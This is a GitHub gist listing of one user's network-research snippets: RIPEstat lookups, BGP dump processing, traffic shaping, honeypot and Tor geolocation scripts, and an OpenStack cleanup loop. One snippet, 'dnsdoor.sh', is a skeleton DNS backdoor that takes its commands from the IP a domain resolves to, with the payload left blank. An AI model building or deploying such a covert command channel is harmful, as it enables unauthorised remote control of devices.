Skip to content

Instantly share code, notes, and snippets.

View aojea's full-sized avatar

Antonio Ojea aojea

366 followers · 3 following
View GitHub Profile
@aojea
aojea / RRIPEstat
Created August 26, 2014 10:36
R functions to use the RIPEStat API
library("jsonlite")
# Function that returns the country code of a IP address
geoloc<-function(x){
return(fromJSON(paste0("https://stat.ripe.net/data/geoloc/data.json?resource=",x))$data$locations$country)
}
# Function that returns the ASN of a IP address
getasn<-function(x){
return(fromJSON(paste0("https://stat.ripe.net/data/network-info/data.json?resource=",x))$data$asns[1])
@aojea
aojea / tc_hfsc.sh
Last active August 29, 2015 14:09
#!/bin/sh /etc/rc.common
#
# License GPLv2
# Version 0.1
# Original script from http://wiki.openwrt.org/doc/howto/packet.scheduler/packet.scheduler.example4
# Modified for control in LAN interface too
START=99
EXTRA_COMMANDS="status"
@aojea
aojea / bgpdump2edge.pl
Created January 22, 2015 15:16
Perl script to generate a edge list from a bgpdump output
#!/usr/bin/perl
# Read the bgpdump output and generate a edge list with two columns source destination
use strict;
use warnings;
my $filename = $ARGV[0]; # store the 1st argument into the variable
open FILE, '<', $filename or die $!; # open the file using lexically scoped filehandle
while (<FILE>) {
@aojea
aojea / Rscrape.R
Created January 22, 2015 15:26
Scrape for malware collection
library(XML)
library(RMySQL)
library(jsonlite)
geoloc<-function(x){
return(fromJSON(paste0("https://stat.ripe.net/data/geoloc/data.json?resource=",x))$data$locations$country)
}
getasn<-function(x){
return(fromJSON(paste0("https://stat.ripe.net/data/network-info/data.json?resource=",x))$data$asns[1])
}
@aojea
aojea / BGPinternet.R
Created January 22, 2015 19:45
Internet visualization
library(data.table)
library(bit64)
library(igraph)
library(BioNet)
# Modify with the country
country<-"ES"
# You need the file with the edges genetad with the scrip bpgdump2edge.pl
# Read edge file SRC,DST,IP Prefix, nº ASes AS PATH
edges.df<-fread("bgp/edges2.txt",sep=",",colClasses=c("character","character","character","integer"),header=FALSE)
@aojea
aojea / rsslog2csv.py
Created February 10, 2015 10:49
Download rss log from @Malwared_ honeypot, process it and output a csv
#!/usr/bin/python
import os
import feedparser
import GeoIP
import csv
# assume that maxmind .dat files are in the same directory
# otherwise change the path
gi = GeoIP.open("GeoIP.dat",GeoIP.GEOIP_STANDARD)
@aojea
aojea / importES.py
Created February 20, 2015 13:41
Import Netflow CSV Elasticsearch
#!/usr/bin/python2.7
import csv, sys, time, json, elasticsearch
from elasticsearch import Elasticsearch
from elasticsearch import helpers
mapping = {
"fnf1x": {
"properties": {
"ts": {"type": "date", "format" : "YYYY-MM-dd HH:mm:ss"},
@aojea
aojea / dnsdoor.sh
Last active August 29, 2015 14:16
dns backdoor
#!/bin/ash
TASK=`ping -c 1 your.domain.here | grep PING | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'`
case $TASK in
127.0.0.1)
#Your code here
Message="Ok1"
;;
127.0.0.2)
@aojea
aojea / tor2geoipcsv.py
Last active August 29, 2015 14:17
Geoloc Tor nodes
#!/usr/bin/python
import os
import re
import GeoIP
import csv
import urllib2
# Update maxmind databases:
os.system('wget -N http://geolite.maxmind.com/download/geoip/database/GeoLiteCountry/GeoIP.dat.gz')
@aojea
aojea / cleanup_neutron.sh
Created December 28, 2015 18:54
Script to clean up neutron objects, in this case it cleans all rally remaining routers and networks
for router_id in `neutron router-list | grep 's_rally' | awk '{print $2}'`; do
neutron router-gateway-clear $router_id
subnet_id=`neutron router-port-list $router_id | grep 'subnet_id' | awk '{print $8}' | awk -F '\"' '{print $2}'`
neutron router-interface-delete $router_id $subnet_id
neutron router-delete $router_id
net_id=`neutron subnet-show $subnet_id | grep 'network_id' | awk '{print $4}'`
neutron subnet-delete $subnet_id
neutron net-delete $net_id
done